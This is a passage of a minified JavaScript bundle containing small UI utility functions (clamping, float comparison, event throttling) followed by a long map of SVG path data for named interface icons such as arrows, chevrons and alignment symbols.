0===e&&(e=[]),c.length-e.length}function H(c,e,t){return void 0===t&&(t=1e-5),Math.abs(c-e)<=t}function V(c,e,t){if(null==c)return c;if(t<e)throw new Error(a.a);return Math.min(Math.max(c,e),t)}function p(c){if(!isFinite(c))return 0;for(var e=1,t=0;Math.round(c*e)/e!==c;)e*=10,t++;return t}function C(c,e,t){var n=y(function(e){c.dispatchEvent(new CustomEvent(t,e))});return c.addEventListener(e,n),n}function L(c,e){return void 0===e&&(e={}),y(c,function(c){e.preventDefault&&c.preventDefault()},function(c){return c.persist()})}function g(c){return y(c)}function y(c,e,t){var n=!1;return function(){for(var a=[],l=0;l<arguments.length;l++)a[l]=arguments[l];h(e)&&e.apply(void 0,a),n||(n=!0,h(t)&&t.apply(void 0,a),requestAnimationFrame(function(){c.apply(void 0,a),n=!1}))}}t.d(e,"safeInvokeMember",function(){return s.a})}.call(this,t("8oxB"))},QRwY:function(c,e,t){"use strict";var n=t("mrSG"),a=t("TSYQ"),l=t.n(a),s=t("q1tI"),r={add:["M10.99 6.99h-2v-2c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1v-2h2c.55 0 1-.45 1-1s-.45-1-1-1zm-3-7c-4.42 0-8 3.58-8 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm0 14c-3.31 0-6-2.69-6-6s2.69-6 6-6 6 2.69 6 6-2.68 6-6 6z"],"add-column-left":["M15 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-5 14H2V2h8v12zm4 0h-3V2h3v12zM4 9h1v1c0 .55.45 1 1 1s1-.45 1-1V9h1c.55 0 1-.45 1-1s-.45-1-1-1H7V6c0-.55-.45-1-1-1s-1 .45-1 1v1H4c-.55 0-1 .45-1 1s.45 1 1 1z"],"add-column-right":["M8 9h1v1c0 .55.45 1 1 1s1-.45 1-1V9h1c.55 0 1-.45 1-1s-.45-1-1-1h-1V6c0-.55-.45-1-1-1s-1 .45-1 1v1H8c-.55 0-1 .45-1 1s.45 1 1 1zm7-9H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM5 14H2V2h3v12zm9 0H6V2h8v12z"],"add-row-bottom":["M6 11h1v1c0 .55.45 1 1 1s1-.45 1-1v-1h1c.55 0 1-.45 1-1s-.45-1-1-1H9V8c0-.55-.45-1-1-1s-1 .45-1 1v1H6c-.55 0-1 .45-1 1s.45 1 1 1zm9-11H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H2V6h12v8zm0-9H2V2h12v3z"],"add-row-top":["M15 0H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 14H2v-3h12v3zm0-4H2V2h12v8zM6 7h1v1c0 .55.45 1 1 1s1-.45 1-1V7h1c.55 0 1-.45 1-1s-.45-1-1-1H9V4c0-.55-.45-1-1-1s-1 .45-1 1v1H6c-.55 0-1 .45-1 1s.45 1 1 1z"],"add-to-artifact":["M14 4.01h-1v-1c0-.55-.45-1-1-1s-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1v-1h1c.55 0 1-.45 1-1 0-.56-.45-1-1-1zm-13 2h6c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm8 6H1c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1 0-.56-.45-1-1-1zm0-4H1c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1 0-.56-.45-1-1-1z"],"add-to-folder":["M.01 7V5H16v7c0 .55-.45 1-1 1H9.005v-2.99C8.974 8.332 7.644 7 5.996 7H.01zM15 2H7.416L5.706.29a.996.996 0 0 0-.71-.29H1C.45 0 0 .45 0 1v3h15.99V3c.01-.55-.44-1-.99-1zM5.997 9H2c-.55 0-1 .45-1 1s.45 1 1 1h1.589L.3 14.29a1.003 1.003 0 0 0 1.42 1.42l3.287-3.29v1.59c0 .55.45 1 1 1 .549 0 .999-.45.999-1v-4A1.02 1.02 0 0 0 5.996 9z"],airplane:["M16 1.5A1.498 1.498 0 0 0 13.44.44L9.91 3.97 2 1 1 3l5.93 3.95L3.88 10H1l-1 1 3 2 2 3 1-1v-2.88l3.05-3.05L13 15l2-1-2.97-7.91 3.53-3.53c.27-.27.44-.65.44-1.06z"],"align-center":["M4 4c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1H4zM1 3h14c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm13 10H2c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1zm1-6H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm-5 5c.55 0 1-.45 1-1s-.45-1-1-1H6c-.55 0-1 .45-1 1s.45 1 1 1h4z"],"align-justify":["M15 12.98H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm-14-10h14c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1 0 .56.45 1 1 1zm14 4H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm0-3H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zm0 6H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],"align-left":["M13 13H1c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1zM1 3h14c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm0 3h8c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm14 1H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM1 12h4c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1z"],"align-right":["M15 12.98H3c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1zm-14-10h14c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1 0 .56.45 1 1 1zm14 1H7c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1zm0 6h-4c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1zm0-3H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],"alignment-bottom":["M10 12h3c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1h-3c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1zm5 2H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM3 12h3c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1z"],"alignment-horizontal-center":["M15 7h-1V6c0-.55-.45-1-1-1h-3c-.55 0-1 .45-1 1v1H7V3c0-.55-.45-1-1-1H3c-.55 0-1 .45-1 1v4H1c-.55 0-1 .45-1 1s.45 1 1 1h1v4c0 .55.45 1 1 1h3c.55 0 1-.45 1-1V9h2v1c0 .55.45 1 1 1h3c.55 0 1-.45 1-1V9h1c.55 0 1-.45 1-1s-.45-1-1-1z"],"alignment-left":["M9 9H5c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1zM1 0C.45 0 0 .45 0 1v14c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm13 2H5c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1z"],"alignment-right":["M11 9H7c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h4c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1zm4-9c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm-4 2H2c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1z"],"alignment-top":["M15 0H1C.45 0 0 .45 0 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM6 4H3c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1h3c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm7 0h-3c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1h3c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1z"],"alignment-vertical-center":["M13 2H9V1c0-.55-.45-1-1-1S7 .45 7 1v1H3c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h4v2H6c-.55 0-1 .45-1 1v3c0 .55.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1v-1h1c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1H9V7h4c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1z"],annotation:["M15.52 2.77c.3-.29.48-.7.48-1.15C16 .73 15.27 0 14.38 0c-.45 0-.85.18-1.15.48l-1.34 1.34 2.3 2.3 1.33-1.35zM7.4 10.9l6.21-6.21-2.3-2.3L5.1 8.6l2.3 2.3zM14 14H2V2h6.34l2-2H1C.45 0 0 .45 0 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V5.66l-2 2V14zM3 13l3.58-1.29-2.29-2.27L3 13z"],application:["M3.5 7h7c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-7c-.28 0-.5.22-.5.5s.22.5.5.5zM15 1H1c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zm-1 12H2V5h12v8zM3.5 9h4c.28 0 .5-.22.5-.5S7.78 8 7.5 8h-4c-.28 0-.5.22-.5.5s.22.5.5.5zm0 2h5c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-5c-.28 0-.5.22-.5.5s.22.5.5.5z"],applications:["M3.5 11h2c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-2c-.28 0-.5.22-.5.5s.22.5.5.5zm0-2h5c.28 0 .5-.22.5-.5S8.78 8 8.5 8h-5c-.28 0-.5.22-.5.5s.22.5.5.5zM11 4H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm-1 10H2V7h8v7zm5-14H5c-.55 0-1 .45-1 1v2h2V2h8v7h-1v2h2c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM3.5 13h3c.28 0 .5-.22.5-.5s-.22-.5-.5-.5h-3c-.28 0-.5.22-.5.5s.22.5.5.5z"],"arrow-bottom-left":["M14 3a1.003 1.003 0 0 0-1.71-.71L4 10.59V6c0-.55-.45-1-1-1s-1 .45-1 1v7c0 .55.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1H5.41l8.29-8.29c.19-.18.3-.43.3-.71z"],"arrow-bottom-right":["M13 5c-.55 0-1 .45-1 1v4.59l-8.29-8.3a1.003 1.003 0 0 0-1.42 1.42l8.3 8.29H6c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1z"],"arrow-down":["M13 8c-.3 0-.5.1-.7.3L9 11.6V2c0-.5-.4-1-1-1s-1 .5-1 1v9.6L3.7 8.3C3.5 8.1 3.3 8 3 8c-.5 0-1 .5-1 1 0 .3.1.5.3.7l5 5c.2.2.4.3.7.3s.5-.1.7-.3l5-5c.2-.2.3-.4.3-.7 0-.6-.4-1-1-1z"],"arrow-left":["M13.99 6.99H4.41L7.7 3.7a1.003 1.003 0 0 0-1.42-1.42l-5 5a1.014 1.014 0 0 0 0 1.42l5 5a1.003 1.003 0 0 0 1.42-1.42L4.41 8.99H14c.55 0 1-.45 1-1s-.46-1-1.01-1z"],"arrow-right":["M14.7 7.29l-5-5a.965.965 0 0 0-.71-.3 1.003 1.003 0 0 0-.71 1.71l3.29 3.29H1.99c-.55 0-1 .45-1 1s.45 1 1 1h9.59l-3.29 3.29a1.003 1.003 0 0 0 1.42 1.42l5-5c.18-.18.29-.43.29-.71s-.12-.52-.3-.7z"],"arrow-top-left":["M13.71 12.29L5.41 4H10c.55 0 1-.45 1-1s-.45-1-1-1H3c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1s1-.45 1-1V5.41l8.29 8.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],"arrow-top-right":["M13 2H6c-.55 0-1 .45-1 1s.45 1 1 1h4.59L2.3 12.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L12 5.41V10c0 .55.45 1 1 1s1-.45 1-1V3c0-.55-.45-1-1-1z"],"arrow-up":["M13.7 6.3l-5-5C8.5 1.1 8.3 1 8 1s-.5.1-.7.3l-5 5c-.2.2-.3.4-.3.7 0 .6.5 1 1 1 .3 0 .5-.1.7-.3L7 4.4V14c0 .6.4 1 1 1s1-.4 1-1V4.4l3.3 3.3c.2.2.4.3.7.3.6 0 1-.4 1-1 0-.3-.1-.5-.3-.7z"],"arrows-horizontal":["M15.7 7.3l-4-4c-.2-.2-.4-.3-.7-.3-.6 0-1 .5-1 1 0 .3.1.5.3.7L12.6 7H3.4l2.3-2.3c.2-.2.3-.4.3-.7 0-.5-.4-1-1-1-.3 0-.5.1-.7.3l-4 4c-.2.2-.3.4-.3.7s.1.5.3.7l4 4c.2.2.4.3.7.3.6 0 1-.4 1-1 0-.3-.1-.5-.3-.7L3.4 9h9.2l-2.3 2.3c-.2.2-.3.4-.3.7 0 .6.4 1 1 1 .3 0 .5-.1.7-.3l4-4c.2-.2.3-.4.3-.7s-.1-.5-.3-.7z"],"arrows-vertical":["M12 10c-.3 0-.5.1-.7.3L9 12.6V3.4l2.3 2.3c.2.2.4.3.7.3.6 0 1-.4 1-1 0-.3-.1-.5-.3-.7l-4-4C8.5.1 8.3 0 8 0s-.5.1-.7.3l-4 4c-.2.2-.3.4-.3.7 0 .6.5 1 1 1 .3 0 .5-.1.7-.3L7 3.4v9.2l-2.3-2.3c-.2-.2-.4-.3-.7-.3-.5 0-1 .4-1 1 0 .3.1.5.3.7l4 4c.2.2.4.3.7.3s.5-.1.7-.3l4-4c.2-.2.3-.4.3-.7 0-.6-.4-1-1-1z"],asterisk:["M14.54 11.18l.01-.02L9.8 8l4.75-3.17-.01-.02c.27-.17.46-.46.46-.81 0-.55-.45-1-1-1-.21 0-.39.08-.54.18l-.01-.02L9 6.13V1c0-.55-.45-1-1-1S7 .45 7 1v5.13L2.55 3.17l-.01.01A.969.969 0 0 0 2 3c-.55 0-1 .45-1 1 0 .35.19.64.46.82l-.01.01L6.2 8l-4.75 3.17.01.02c-.27.17-.46.46-.46.81 0 .55.45 1 1 1 .21 0 .39-.08.54-.18l.01.02L7 9.87V15c0 .55.45 1 1 1s1-.45 1-1V9.87l4.45 2.96.01-.02c.15.11.33.19.54.19.55 0 1-.45 1-1 0-.35-.19-.64-.46-.82z"],"automatic-updates":["M8 14c-3.31 0-6-2.69-6-6 0-1.77.78-3.36 2-4.46V5c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1H1C.45 0 0 .45 0 1s.45 1 1 1h1.74A7.95 7.95 0 0 0 0 8c0 4.42 3.58 8 8 8 .55 0 1-.45 1-1s-.45-1-1-1zM8 2a5.9 5.9 0 0 1 2.95.81l1.47-1.47A7.893 7.893 0 0 0 8 0c-.55 0-1 .45-1 1s.45 1 1 1zm2.71 6.71l5-5a1.003 1.003 0 0 0-1.42-1.42L10 6.59l-1.29-1.3a1.003 1.003 0 0 0-1.42 1.42l2 2c.18.18.43.29.71.29s.53-.11.71-.29zM16 8c0-.55-.06-1.08-.16-1.6l-1.87 1.87A5.966 5.966 0 0 1 12 12.45V11c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1h-1.74A7.95 7.95 0 0 0 16 8z"],badge:["M13.36 4.59c-.15-1.13.5-2.01 1.1-2.87L13.43.53c-1.72.88-4.12.65-5.63-.53-1.51 1.18-3.91 1.41-5.63.52l-1.03 1.2c.61.86 1.25 1.74 1.1 2.87-.3 2.29-2.45 4.17-1.32 6.68.45 1.14 1.44 1.9 2.72 2.2 1.56.36 3.52.72 4.16 2.53.64-1.81 2.6-2.16 4.16-2.54 1.28-.3 2.27-1.06 2.72-2.2 1.12-2.5-1.03-4.38-1.32-6.67z"],"ban-circle":["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm3 9H5c-.55 0-1-.45-1-1s.45-1 1-1h6c.55 0 1 .45 1 1s-.45 1-1 1z"],"bank-account":["M15.36 6.46l-.62-.14c-.31-1.12-.98-2.15-1.87-2.99l.4-1.77a.438.438 0 0 0-.49-.56c-.85.09-1.6.42-2.14.98-.84-.32-1.87-.51-2.85-.51-2.49 0-4.63 1.17-5.92 2.89-.18-.04-.36-.09-.53-.09-.76 0-1.34.61-1.34 1.4 0 .56.31 1.03.76 1.26-.05.33-.09.7-.09 1.07 0 1.68.71 3.17 1.83 4.34l-.27 1.59c-.09.56.35 1.07.89 1.07h.58c.45 0 .8-.33.89-.79l.04-.37c.94.42 2 .7 3.16.7 1.11 0 2.23-.23 3.16-.7l.05.37c.09.47.45.79.89.79h.58c.53 0 .98-.51.89-1.07l-.27-1.54c.62-.61 1.07-1.35 1.38-2.15l.8-.19c.4-.09.71-.47.71-.93V7.4c.09-.47-.22-.84-.62-.94zM12 8c-.6 0-1-.7-1-1.5S11.4 5 12 5s1 .7 1 1.5S12.6 8 12 8zM6.21 4.92c-.41.2-.91.04-1.12-.36-.21-.4-.04-.88.37-1.07 1.35-.65 2.73-.65 4.08 0 .41.2.58.68.37 1.07-.21.4-.71.56-1.12.36-.87-.43-1.71-.43-2.58 0z"],barcode:["M0 14h2V2H0v12zm6 0h1V2H6v12zm2 0h1V2H8v12zm-5 0h2V2H3v12zM15 2v12h1V2h-1zm-5 12h1V2h-1v12zm2 0h2V2h-2v12z"],blank:[],"blocked-person":["M9.39 12.69c-1.2-.53-1.04-.85-1.08-1.29-.01-.07-.01-.13-.02-.2.41-.37.75-.87.97-1.44 0 0 .01-.03.01-.04.05-.13.09-.26.13-.39.27-.06.43-.36.5-.63.01-.03.03-.08.05-.12C8.18 7.8 6.94 6.04 6.94 4c0-.32.04-.62.09-.92-.17-.03-.35-.08-.51-.08-.65 0-1.37.2-1.88.59-.5.38-.87.92-1.05 1.51-.04.14-.07.27-.09.41-.09.48-.14 1.23-.14 1.74v.06c-.19.08-.36.27-.4.68-.03.31.1.59.16.7.06.28.23.59.51.64.04.14.08.27.13.39 0 .01.01.02.01.02v.01c.22.59.57 1.1.99 1.46 0 .06-.01.12-.01.17-.04.44.08.76-1.12 1.29-1.2.53-3.01 1.1-3.38 1.95C-.12 15.5.03 16 .03 16h12.96s.15-.5-.22-1.36c-.37-.85-2.18-1.42-3.38-1.95zM11.97 0C9.75 0 7.94 1.79 7.94 4s1.8 4 4.03 4S16 6.21 16 4s-1.8-4-4.03-4zM9.96 4c0-1.1.9-2 2.01-2 .37 0 .72.11 1.02.28l-2.75 2.73c-.17-.3-.28-.64-.28-1.01zm2.01 2c-.37 0-.72-.11-1.02-.28l2.75-2.73c.18.3.28.64.28 1.01.01 1.1-.9 2-2.01 2z"],bold:["M11.7 7c.2-.4.3-1 .3-1.5v-.4V5c0-.1 0-.2-.1-.3v-.1C11.4 3.1 10.1 2 8.5 2H4c-.5 0-1 .4-1 1v10c0 .5.4 1 1 1h5c2.2 0 4-1.8 4-4 0-1.2-.5-2.3-1.3-3zM6 5h2c.6 0 1 .4 1 1s-.4 1-1 1H6V5zm3 6H6V9h3c.6 0 1 .4 1 1s-.4 1-1 1z"],book:["M2 1v14c0 .55.45 1 1 1h1V0H3c-.55 0-1 .45-1 1zm11-1h-1v7l-2-2-2 2V0H5v16h8c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],bookmark:["M11.2.01h-.15C11.03.01 11.02 0 11 0H5c-.02 0-.03.01-.05.01H4.8c-.44 0-.8.37-.8.82v14.75c0 .45.25.56.57.24l2.87-2.94c.31-.32.82-.32 1.13 0l2.87 2.94c.31.32.57.21.57-.24V.83C12 .38 11.64.01 11.2.01z"],box:["M6 10h4c.55 0 1-.45 1-1s-.45-1-1-1H6c-.55 0-1 .45-1 1s.45 1 1 1zm9.93-4.37v-.02L13.94.63C13.78.26 13.42 0 13 0H3c-.42 0-.78.26-.93.63L.08 5.61l-.01.02C.03 5.74 0 5.87 0 6v9c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V6c0-.13-.03-.26-.07-.37zM9 2h3.32l1.2 3H9V2zM3.68 2H7v3H2.48l1.2-3zM14 14H2V7h12v7z"],briefcase:["M15 3.98h-3v-2c0-.55-.45-1-1-1H5c-.55 0-1 .45-1 1v2H1c-.55 0-1 .45-1 1v4h3v-1h2v1h6v-1h2v1h3v-4c0-.55-.45-1-1-1zm-5 0H6v-1h4v1zm3 7h-2v-1H5v1H3v-1H0v4c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-4h-3v1z"],build:["M15.39 12.41L7.7 6l1.07-1.1c.34-.34-.12-.63.12-1.26.88-2.17 3.41-2.35 3.41-2.35s.36-.37.71-.72C9.74-.81 7.53.53 6.54 1.4L3.12 4.9l-.71.72c-.39.4-.39 1.05 0 1.45l-.7.72c-.39-.4-1.02-.4-1.41 0s-.39 1.05 0 1.45l1.41 1.45c.39.4 1.02.4 1.41 0s.39-1.05 0-1.45l.71-.72c.39.4 1.02.4 1.41 0l.8-.82 6.39 7.67c.82.82 2.14.82 2.96 0 .81-.82.81-2.15 0-2.96z"],calculator:["M13 0H3c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zM6 14H4v-2h2v2zm0-3H4V9h2v2zm0-3H4V6h2v2zm3 6H7v-2h2v2zm0-3H7V9h2v2zm0-3H7V6h2v2zm3 6h-2V9h2v5zm0-6h-2V6h2v2zm0-3H4V2h8v3z"],calendar:["M11 3c.6 0 1-.5 1-1V1c0-.6-.4-1-1-1s-1 .4-1 1v1c0 .5.4 1 1 1zm3-2h-1v1c0 1.1-.9 2-2 2s-2-.9-2-2V1H6v1c0 1.1-.9 2-2 2s-2-.9-2-2V1H1c-.6 0-1 .5-1 1v12c0 .6.4 1 1 1h13c.6 0 1-.4 1-1V2c0-.6-.5-1-1-1zM5 13H2v-3h3v3zm0-4H2V6h3v3zm4 4H6v-3h3v3zm0-4H6V6h3v3zm4 4h-3v-3h3v3zm0-4h-3V6h3v3zM4 3c.6 0 1-.5 1-1V1c0-.6-.4-1-1-1S3 .4 3 1v1c0 .5.4 1 1 1z"],camera:["M15 3h-2.59L10.7 1.29A.956.956 0 0 0 10 1H6c-.28 0-.53.11-.71.29L3.59 3H1c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h2.56c1.1 1.22 2.67 2 4.44 2s3.34-.78 4.44-2H15c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1zM3 6H1V5h2v1zm5 6c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4zm0-6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],"caret-down":["M12 6.5c0-.28-.22-.5-.5-.5h-7a.495.495 0 0 0-.37.83l3.5 4c.09.1.22.17.37.17s.28-.07.37-.17l3.5-4c.08-.09.13-.2.13-.33z"],"caret-left":["M9.5 4c-.13 0-.24.05-.33.13l-4 3.5c-.1.09-.17.22-.17.37s.07.28.17.37l4 3.5a.495.495 0 0 0 .83-.37v-7c0-.28-.22-.5-.5-.5z"],"caret-right":["M11 8c0-.15-.07-.28-.17-.37l-4-3.5A.495.495 0 0 0 6 4.5v7a.495.495 0 0 0 .83.37l4-3.5c.1-.09.17-.22.17-.37z"],"caret-up":["M11.87 9.17s.01 0 0 0l-3.5-4C8.28 5.07 8.15 5 8 5s-.28.07-.37.17l-3.5 4a.495.495 0 0 0 .37.83h7a.495.495 0 0 0 .37-.83z"],"cell-tower":["M8.97 6.76c-.01-.05-.04-.08-.06-.13-.02-.05-.03-.1-.05-.15.08-.14.14-.3.14-.48 0-.55-.45-1-1-1s-1 .45-1 1c0 .18.06.34.14.48-.03.05-.03.1-.05.15-.02.05-.05.08-.06.13l-2 8c-.13.54.19 1.08.73 1.21a.995.995 0 0 0 1.21-.73L7.53 13h.94l.56 2.24a1 1 0 0 0 1.94-.48l-2-8zM3.72 1.7C4.1 1.3 4.09.67 3.7.28S2.67-.09 2.28.3c-3.05 3.12-3.05 8.28 0 11.4a.996.996 0 1 0 1.43-1.39c-2.28-2.35-2.28-6.27.01-8.61zM11.6 3.2c-.44-.33-1.07-.24-1.4.2-.33.44-.24 1.07.2 1.4.43.32.53 1.96-.04 2.43-.42.35-.48.98-.13 1.41.35.42.98.48 1.41.13 1.59-1.33 1.39-4.5-.04-5.57z","M13.72.3c-.39-.4-1.02-.4-1.41-.02s-.41 1.02-.03 1.42c2.29 2.34 2.29 6.26 0 8.6-.39.39-.38 1.03.02 1.41s1.03.38 1.41-.02c3.05-3.11 3.05-8.27.01-11.39zM5.4 7.23c-.57-.47-.47-2.11-.04-2.43.44-.33.53-.96.2-1.4s-.96-.53-1.4-.2c-1.44 1.07-1.63 4.24-.04 5.57.42.35 1.05.3 1.41-.13.35-.42.29-1.06-.13-1.41z"],changes:["M8.29 7.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3a1.003 1.003 0 0 0-1.42-1.42L13 7.59V1c0-.55-.45-1-1-1s-1 .45-1 1v6.59l-1.29-1.3a1.003 1.003 0 0 0-1.42 1.42zM14.5 13h-13c-.83 0-1.5.67-1.5 1.5S.67 16 1.5 16h13c.83 0 1.5-.67 1.5-1.5s-.67-1.5-1.5-1.5zM1 5c.28 0 .53-.11.71-.29L3 3.41V10c0 .55.45 1 1 1s1-.45 1-1V3.41L6.29 4.7c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3C4.53.11 4.28 0 4 0s-.53.11-.71.29l-3 3A1.003 1.003 0 0 0 1 5z"],chart:["M0 15c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V9.4L0 11v4zm6-5.5V15c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-5l-1 1-3-1.5zM13 7l-1 1v7c0 .55.45 1 1 1h2c.55 0 1-.45 1-1V7.88c-.26.07-.58.12-1 .12-1.96 0-2-1-2-1zm2-6h-3c-.55 0-1 .45-1 1s.45 1 1 1h.59L8.8 6.78 5.45 5.11v.01C5.31 5.05 5.16 5 5 5s-.31.05-.44.11V5.1l-4 2v.01C.23 7.28 0 7.61 0 8c0 .55.45 1 1 1 .16 0 .31-.05.44-.11v.01L5 7.12 8.55 8.9v-.01c.14.06.29.11.45.11.28 0 .53-.11.71-.29L14 4.41V5c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1z"],chat:["M6 10c-1.1 0-2-.9-2-2V3H1c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1v2a1.003 1.003 0 0 0 1.71.71L5.41 13H10c.55 0 1-.45 1-1v-1.17l-.83-.83H6zm9-10H6c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h4.59l2.71 2.71c.17.18.42.29.7.29.55 0 1-.45 1-1V9c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],"chevron-backward":["M7.41 8l3.29-3.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L6 6.59V4c0-.55-.45-1-1-1s-1 .45-1 1v8c0 .55.45 1 1 1s1-.45 1-1V9.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L7.41 8z"],"chevron-down":["M12 5c-.28 0-.53.11-.71.29L8 8.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42l4 4c.18.18.43.29.71.29s.53-.11.71-.29l4-4A1.003 1.003 0 0 0 12 5z"],"chevron-forward":["M10 3c-.55 0-1 .45-1 1v2.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42L7.59 8 4.3 11.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L9 9.41V12c0 .55.45 1 1 1s1-.45 1-1V4c0-.55-.45-1-1-1z"],"chevron-left":["M7.41 8l3.29-3.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-4 4C5.11 7.47 5 7.72 5 8c0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L7.41 8z"],"chevron-right":["M10.71 7.29l-4-4a1.003 1.003 0 0 0-1.42 1.42L8.59 8 5.3 11.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4-4c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],"chevron-up":["M12.71 9.29l-4-4C8.53 5.11 8.28 5 8 5s-.53.11-.71.29l-4 4a1.003 1.003 0 0 0 1.42 1.42L8 7.41l3.29 